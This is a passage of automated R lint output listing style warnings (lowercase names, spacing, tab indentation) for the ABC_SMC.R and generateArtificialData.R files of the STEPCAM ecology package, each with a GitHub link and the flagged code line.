^~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:14:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:218:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:223:11:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:23:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:39:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:53:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:224:63:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:225:29:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L228) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:228:14:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:34:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:21:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L234) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:234:22:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:236:13:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:38:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:248:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:248:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:249:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:250:16:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:21:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:252:31:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:252:41:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:253:21:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:253:29:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L257) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:35:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:51:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:258:9:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:32:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:258:37:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:262:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:5:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:264:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:271:61:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:275:63:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:278:15:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:279:44:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/be4a45a496048d216670492c58e3829f8cd5b1a0/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never 